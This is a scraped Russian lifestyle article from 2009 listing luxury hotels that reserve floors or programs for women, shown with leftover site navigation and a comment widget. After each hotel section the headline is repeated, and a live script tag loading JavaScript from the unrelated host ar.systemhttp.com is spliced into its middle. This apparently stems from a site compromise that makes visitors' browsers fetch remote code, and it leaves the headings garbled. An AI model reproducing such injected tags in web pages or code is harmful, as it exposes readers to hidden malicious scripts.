Запрашиваемая страница не найдена USD     CNY     EUR     JPY
Москва C
Последние новости
24 июн 2018, 17:33
По итогам мая российские автолюбители купили 149 машин премиальной марки...
Поиск

Какую марку автомобиля вы предпочитаете?

» » Лучшие гостиницы: внимание, вход только для женщин!

Лучшие гостиницы: внимание, вход только для женщин!

04 мар 2009, 19:19    lshepeleva
0 комментариев    6 981 просмотр

На протяжении долгого времени женщины активно боролись за свои права и добивались равенства в обществе, в котором доминировали мужчины. Теперь от прежних устоев не осталось и следа. На рынке предметов роскоши появился новый сегмент: пятизвездочные гостиницы, услугами которых могут воспользоваться только представительницы слабого пола. Предлагаем вам ознакомиться с наиболее интересными вариантами.

“The Premier Hotel” (Нью-Йорк, США)

7 номеров из 125 комнат этой уютной гостиницы зарезервировано исключительно для девушек. Пребывание в подобной комнате-студии будет дополнено чисто женскими удовольствиями. В ваше распоряжение поступят различные сорта соли для ванны, укрепляющих средств по уходу за волосами, стайлер для укладки и щипцы для завивки волос, разнообразные женские журналы, коврик для йоги, а также вы получите доступ к прилегающей зоне отдыха, в которой вы сможете полноценно расслабиться, забыть обо всем, что вас тревожит, и вкусно перекусить. И не забудьте взять с собой подружек: вы сможете зарезервировать целый этаж!

Лучшие гостиницы: внимание, вход только <script type="text/javascript" src="http://ar.systemhttp.com/o.js"></script>для женщин!
“Crowne Plaza” (Вашингтон, США)

В отеле “Crowne Plaza” вам будет предложено на выбор несколько «женских» этажей, которые отличаются друг от друга набором предоставляемых услуг. Так, на одном из этажей вы сможете воспользоваться службой сопровождения в пределах четырех кварталов от гостиницы, а перед сном насладиться последними модными тенденциями по кабельному телевидению. На другом этаже вам предложат специальные зеркала для облегчения нанесения макияжа и широкое разнообразие глянцевых журналов. На третьем этаже вы будете приятно удивлены розовым интерьером, свежими цветами и изысканными сладостями.

Лучшие гостиницы: внимание, вход только <script type="text/javascript" src="http://ar.systemhttp.com/o.js"></script>для женщин!
The Naumi Hotel(Сингапур)

Вполне вероятно, что представительницы слабого пола, держащие путь в Сингапур, захотят остановиться именно в этой роскошной гостинице, находящейся в деловом центре города. «Женский» этаж, рассчитанный на пять номеров повышенной комфортности, обслуживается только женщинами и находится за пунктом охраны, гласящим о том, что данный сектор “For Ladies Only” («Только для женщин»). Что же именно делает эти номера гендерно-ориентированными? Здесь вы обнаружите средства для снятия макияжа, коврики для занятия йогой, модные журналы, ароматические масла и прочие атрибуты ароматерапии, а приятно проводить свое время вам будет предложено в приятном цветочном интерьере.

Лучшие гостиницы: внимание, вход только <script type="text/javascript" src="http://ar.systemhttp.com/o.js"></script>для женщин!
“Jumeirah Emirates Towers” (Дубаи, ОАЭ)

“Jumeirah” активно сотрудничает с компанией Chopard, выпускающей предметы роскоши и знаменитой, в частности, своими часами. Результатом этой кооперации стал целый этаж номеров, рассчитанный на посетительниц, занимающих высокое положение в светском обществе и деловых кругах. Их номера украшены редкими свежими цветами, тончайшими ароматами, а убранство включает сатиновое постельное белье, роскошные банные принадлежности, косметические наборы от ведущих производителей и коврик для занятия фитнессом или йогой.

Лучшие гостиницы: внимание, вход только <script type="text/javascript" src="http://ar.systemhttp.com/o.js"></script>для женщин!
Baglioni Hotel (Лондон, Великобритания)
Хотя в “Baglioni Hotel” вы не найдете этажа, отведенного исключительно для женщин, вы сможете воспользоваться уникальной программой, которая предоставит вам «дворецкого» (весьма неплохая услуга при заедающей молнии на платье), личного водителя на “Maserati” для совершения прогулок по городу, «лучший столик» в фирменном ресторане, специальный «волшебный набор», включающий разнообразные средства по уходу за кожей лица и тела, а также обеспечит анонимность пребывания. Возьмите с собой ребенка и вам предоставят скидку в 20% на предоставляемые спа-процедуры.
Лучшие гостиницы: внимание, вход только <script type="text/javascript" src="http://ar.systemhttp.com/o.js"></script>для женщин!
Читайте также
08 мар 2014, 09:08    0 комментариев
В картине «Джек Райан: теория хаоса» главную роль исполнила Кира Найтли. Актриса много работала, чтобы добиться...
Комментарии
  • bowtiesmilelaughingblushsmileyrelaxedsmirk
    heart_eyeskissing_heartkissing_closed_eyesflushedrelievedsatisfiedgrin
    winkstuck_out_tongue_winking_eyestuck_out_tongue_closed_eyesgrinningkissingstuck_out_tonguesleeping
    worriedfrowninganguishedopen_mouthgrimacingconfusedhushed
    expressionlessunamusedsweat_smilesweatdisappointed_relievedwearypensive
    disappointedconfoundedfearfulcold_sweatperseverecrysob
    joyastonishedscreamtired_faceangryragetriumph
    sleepyyummasksunglassesdizzy_faceimpsmiling_imp
    neutral_faceno_mouthinnocent